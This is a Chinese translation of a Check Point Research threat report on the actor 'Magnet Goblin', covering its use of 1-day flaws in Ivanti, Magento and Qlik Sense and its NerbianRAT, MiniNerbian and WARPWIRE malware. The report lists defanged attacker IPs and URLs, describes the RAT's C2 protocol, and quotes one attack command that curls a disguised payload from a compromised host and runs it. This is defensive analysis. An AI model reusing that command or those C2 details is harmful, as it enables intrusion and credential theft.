关键点
Magnet Goblin 是一个出于经济动机的威胁行为者,它迅速采用并利用面向公众的服务中的 1 天漏洞作为初始感染媒介。至少在 Ivanti Connect Secure VPN (CVE-2024-21887) 的一个案例中,该漏洞在发布 POC 后 1 天内就进入了该组织的武器库。
我们认为该攻击者发起的活动针对的是 Ivanti、Magento、Qlink Sense,可能还包括 Apache ActiveMQ。
对攻击者最近的 Ivanti Connect Secure VPN 活动的分析显示, 除了 JavaScript 凭据窃取程序 WARPWIRE 之外,还发现了一种名为NerbianRAT的新型 Linux 版本恶意软件。
该演员的武器库还包括 MiniNerbian、一个小型 Linux 后门以及用于 Windows 的远程监控和管理 (RMM) 工具,例如 ScreenConnect 和 AnyDesk。
介绍
2024 年 1 月 10 日,Ivanti 发布了 有关 Ivanti Connect Secure VPN 中两个漏洞的安全公告。这些漏洞被广泛利用,被识别为 CVE-2023-46805 和 CVE-2023-21887。许多威胁行为者很快就利用了这些漏洞,导致了广泛 的 恶意活动。
Check Point Research 一直在跟踪这些利用情况,并确定了多个针对易受攻击的 Connect Secure VPN 设备的活动集群。与许多其他大规模利用 1 天漏洞的案例一样,区分和识别不同的参与者非常具有挑战性。考虑到这一点,我们决定调查一个引起我们注意的独特集群的内部运作方式,该集群是由我们称为 Magnet Goblin 的威胁行为者发起的。
我们首先分析了 NerbianRAT 的 Linux 变体,但很快发现了其他以前未归因的攻击,这些攻击现在似乎都与同一攻击者有关。我们的分析表明,Magnet Goblin 在方法上采用 1 天漏洞利用来部署自定义 Linux 后门以追求经济利益。
除了 Ivanti 之外,Magnet Goblin 历史上还针对 Magento、Qlik Sense 和可能的 Apache ActiveMQ 部署其针对 Linux 的自定义恶意软件,以及 ConnectWises ScreenConnect 等远程监控和管理软件。其中一些活动已被公开描述,但与任何特定参与者无关。
Magnet Goblin 概述
Magnet Goblin 是一个出于经济动机的威胁行为者,在漏洞披露后,他会迅速利用 1 天漏洞(通常是在边缘设备中)。该行为者使用属于名为 Nerbian 的自定义恶意软件系列的恶意软件。该系列包括 NerbianRAT(一种跨平台 RAT,具有适用于 Windows 和 Linux 的变体)和 MiniNerbian(一种小型 Linux 后门)。
Magnet Goblin 活动之前已被其他安全供应商描述过,但没有与任何特定参与者相关。这些报告都展示了一种清晰的方法,可以快速适应 1 天漏洞。这些包括:
Magento – CVE-2022-24086
Qlik Sense – CVE-2023-41265、CVE-2023-41266 和 CVE-2023-48365
Ivanti Connect 安全 – CVE-2023-46805 和 CVE-2024-21887、CVE-2024-21888 和 CVE-2024-21893。
图 1 – 过去的 Magnet Goblin 活动
Ivanti 剥削活动
在跟踪最近的 Ivanti 漏洞利用浪潮时,我们发现了许多导致下载和部署 ELF 文件的活动,该文件最终是 Linux 版本的 NerbianRAT。Darktrace报告中也描述了这一活动集群,其特点是从攻击者控制的基础设施下载各种有效负载。
下载的有效负载包括 WARPWIRE JavaScript 凭证窃取程序的变体、NerbianRAT Linux 变体,以及用 GO 编写的开源隧道工具 Ligolo。
Linux NerbianRAT
漏洞利用后,从攻击者控制的服务器下载了新的 NerbianRAT 变体。有效负载是从以下 URL 下载的:
http://94.156.71[.]115/lxrt
http://91.92.240[.]113/aparche2
http://45.9.149[.]215/aparche2执行后,该活动中使用的 Linux NerbianRAT 变种会连接回 IP 172.86.66[.]165。
WARPWIRE JS 窃取者
除了 NerbianRAT 之外,威胁发起者还部署了 WARPWIRE 的自定义变体,这是Mandiant最近在关于利用 Ivanti Connect Secure 产品中新报告的漏洞进行攻击的博客系列中披露的一种窃取程序。有趣的是,WARPWIRE 似乎被多个威胁行为者利用。
窃取者非常简单,它通过 HTTP 请求将 VPN 凭据发送到外部服务器。在我们归因于 Magnet Goblin 的变体中,泄露的 VPN 凭证被发送到 URL https://www.miltonhouse[.]nl/pub/opt/processor.php。我们对此次攻击中使用的域和 URL 的分析表明,这是一个受损的 Magento 服务器。
图 2 – Magnet Goblin 使用的 WARPWIRE 变体
Magento 漏洞利用活动
整个 2022 年,Magnet Goblin 将 Magento 服务器作为目标,甚至将其用作其他活动的 C2 服务器,如 Windows NerbianRAT 和 WARPWIRE 中所观察到的那样。为了在受感染的 Magento 服务器中建立立足点,攻击者部署了 MiniNerbian,这是 Linux NerbianRAT 的较小版本。安全公司Foregenix和Sansec将 MiniNerbian 变体与 2022 年 9 月的 Magento 漏洞利用攻击联系起来,表明他们是出于经济动机。
图 3 – Magnet Goblin 活动中使用的受损 Magento 服务器
Sansec 报告中显示了如何实施漏洞的一个示例,其中 MiniNerbian 安装命令
cd pub;cd media;curl https : //theroots[.]in/pub/media/avatar/223sam.jpg -o cli &&chmod +x cli&&./cli;已插入sales_order_address表中。
基础设施分析
对 Magneto 和 Ivanti 活动中涉及的恶意软件基础设施的分析揭示了 Magnet Goblin 运营商使用的其他几种工具。其中一些在其他报告中进行了描述,并包括适用于 Linux 的其他工具,例如隧道工具 Ligolo,但攻击者的武器库不仅限于 Linux。
威胁参与者的 Windows 工具似乎包括流行的远程监控和管理工具 (RMM) 软件 ScreenConnect,该软件是从攻击者控制的服务器(地址为 94.156.71[.]115)下载的。该 IP 地址也与 Qlik Sense 的利用相关,导致下载 ScreenConnect 和 AnyDesk 等类似工具。
eSentire 报告还暗示可能与 Cactus 勒索软件存在关联。尽管我们无法验证这种联系,但我们在 Cactus 勒索软件入侵中观察到并公开报告的TTP 存在一些相关性。
除了可能指向 Qlik Sense 漏洞利用的链接之外,Nerbian 关联服务器上可见的其他文件表明威胁行为者可能试图利用 Apache ActiveMQ 服务器。从服务器下载的 XML 文件对此进行了演示,该文件与用于触发漏洞利用的 ActiveMQ 远程 XML 的格式相匹配。
图 4 – 来自 Nerbian 关联 IP 地址的可能的 ApacheMQ 利用 XML
在我们发现的 BAT 部署脚本中也观察到与 Anydesk 使用的其他联系,这些脚本利用了受损的 Magento 服务器:biondocenere[.]com。此 BAT 脚本下载并执行 AnyDesk,并且是从另一台服务器下载的,23.184.48[.]132该服务器也与 ScreenConnect 有效负载相关联。
图 5 – 利用被黑客攻击的 Magento 服务器部署 AnyDesk 的批处理脚本
Nerbian Family 家族
Linux NerbianRAT 分析
背景
NerbianRAT 于 2022 年由 ProofPoint 首次公开披露,并详细介绍了其 Windows 变体的交付情况。然后,Windows NerbianRAT 在 Covid-19 诱饵中发送,用于针对主要位于欧洲的有限目标。该活动的目标尚不清楚,但它是使用who-international[.]com可能与其他网络犯罪活动相关的域 ( ) 进行分发的。
原始 Windows 变体与其他 Magnet Goblin 工具一样,也利用受损的 Magento 服务器作为 C2 www.fernandestechnical[.]com/pub/health_check.php:.
分析
我们最早发现 Linux NerbianRAT 变体是在 2022 年 5 月,当时它的两个变体被提交给 VirusTotal。与 Windows 版本不同,Linux 版本几乎没有任何保护措施。它是用 DWARF 调试信息草率编译的,研究人员可以通过这些信息查看函数名称和全局变量名称等。
在初始执行时,后门会进行重复进程检查,这是通过分配共享内存段来执行的。如果成功,它会自行分叉,这是恶意软件中嵌入的唯一反调试/反分析技巧。在此检查之后,NerbianRAT 开始主要的初始化过程。
图 6 – NerbianRAT 主要功能
初始化
在初始化过程中,恶意软件遵循以下几个步骤:
收集基本信息,包括当前时间、用户名和机器名称。
使用文件值/etc/machine-id和当前进程 ID 的组合生成机器人 ID。
将硬编码的 IP 地址 ( 172.86.66.165) 加载到两个全局变量(主要主机和辅助主机)中。
解密全局工作目录变量并将其设置为%TEMP%.
搜索文件rgs_c.txt,读取其内容并尝试将其解析为以下参数:-pP port -h host
加载稍后用于加密网络通信的 RSA 公钥。
配置
初始化后,Nerbian 继续从文件加载其配置tmp/debconf.socket。它使用硬编码密钥和 16 个空字节作为 IV 以 AES 进行加密。配置本身包含一组广泛的值,这表明了威胁行为者定制后门的努力。
图 7 – NerbianRAT 配置变量
NerbianRAT Linux 变体配置与 Windows 版本类似。大部分配置专用于恶意软件 C2 机制,确定后门的活动时间、其访问 C2 服务器的频率以及类似功能。例如,参数start_worktime和end_worktime用于确定 NerbianRAT 尝试连接其 C2 服务器的时间。
加载配置文件后,将强制执行工作目录/tmp/,并根据配置字段类型设置全局变量主主机b_use_secondary_host。然后它继续与其 C2 通信。
命令与控制
与 Windows 变体不同,Linux NerbianRAT 使用原始 TCP 套接字,以自定义协议来回发送由结构表示的数据 blob。这意味着 C2 服务器逻辑也被重写,以便它可以与该版本的后门进行通信。与 C2 通信时,使用 AES 加密作为主要加密,但根据传输的数据,也可以使用 RSA。
该机器人以两种可能的状态运行:
如果时间不在配置中规定的工作时间内,但b_use_alive_signal配置上的字段已设置,则它会不断向 C2 服务器发送包含先前收集的数据和一些配置字段的 ping。
如果时间在工作时间内(通过将当前时间转换为 UTC,然后检查小时字段并将其与配置字段进行比较来计算),它会向 C2 发送与上述相同的数据。如果服务器批准该数据,它会发送一个有效的操作供后门执行。
从 C2 服务器接收到的缓冲区必须满足以下条件才能有效:
它应该从魔法开始4r3f0 ,然后是 AES 加密缓冲区。
解密后,缓冲区的前 4 个字节应包含以 null 结尾的字符串cmd。
如果满足所有这些条件,则会解析数据并导致以下操作之一:
从可用的各种操作中可以看出,后门为威胁行为者提供了极大的灵活性,可以在不同时间和不同复杂程度进行操作。这使得恶意软件能够在受感染的计算机上保持隐秘但活跃。
MiniNerbian
MiniNerbian 是 NerbianRAT 的简化版本,它有一个主要功能——命令执行。它的代码似乎与 NerbianRAT 共享,尽管 MinNerbian 不仅仅是 NerbianRAT 的一个版本,删除了某些部分,而是一种具有类似功能(例如加密库和字符串解密)的新恶意软件。
后门有一个小配置,由 4 个字段组成,例如请求之间的休眠时间、是全天发出请求还是仅在特定时间发出请求,以及使用哪个 C2。
图 8 – NerbianRAT 和 MiniNerbian 之间的代码相似性
主要区别之一是 MiniNerbian 通信方法,它使用 HTTP 并通过向 /dashboard/ 端点发送 POST 请求来传递数据。相比之下,NerbianRAT 通过原始套接字发送数据。
MiniNerbian 仅支持基于以下功能的三种“操作”:
system_cmd– C2 的请求命令被执行并返回到服务器。
time_flag_change– 恶意软件更新其内部时间标志,根据标志状态,有两种可能返回到 C2:
core_config_set– 这允许更新 MiniNerbian 后门配置。
结论
在围绕广泛的机会主义利用攻击的大量数据和噪音中,识别特定的活动集既带来了技术挑战,也带来了归因挑战。在这种混乱中,我们作为防御者的首要任务是响应和缓解,往往会忽视融入噪音的独特参与者。
其中一个例子是最近由多个威胁参与者实施的 Ivanti Secure Connect VPN 攻击,试图利用仍然可以在线访问易受攻击的设备的狭窄时间窗口。尤其是磁力妖精,似乎正在有条不紊地利用这些事件。
Magnet Goblin 的活动似乎是出于经济动机,它很快就利用 1 天漏洞来传播其定制的 Linux 恶意软件 NerbianRAT 和 MiniNerbian。这些工具在雷达下运行,因为它们大多驻留在边缘设备上。这是威胁行为者以迄今为止尚未受到保护的地区为目标的持续趋势的一部分。
IOCs :
参考链接: https://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulnerabilities/
图片来源网络目标可联系删除
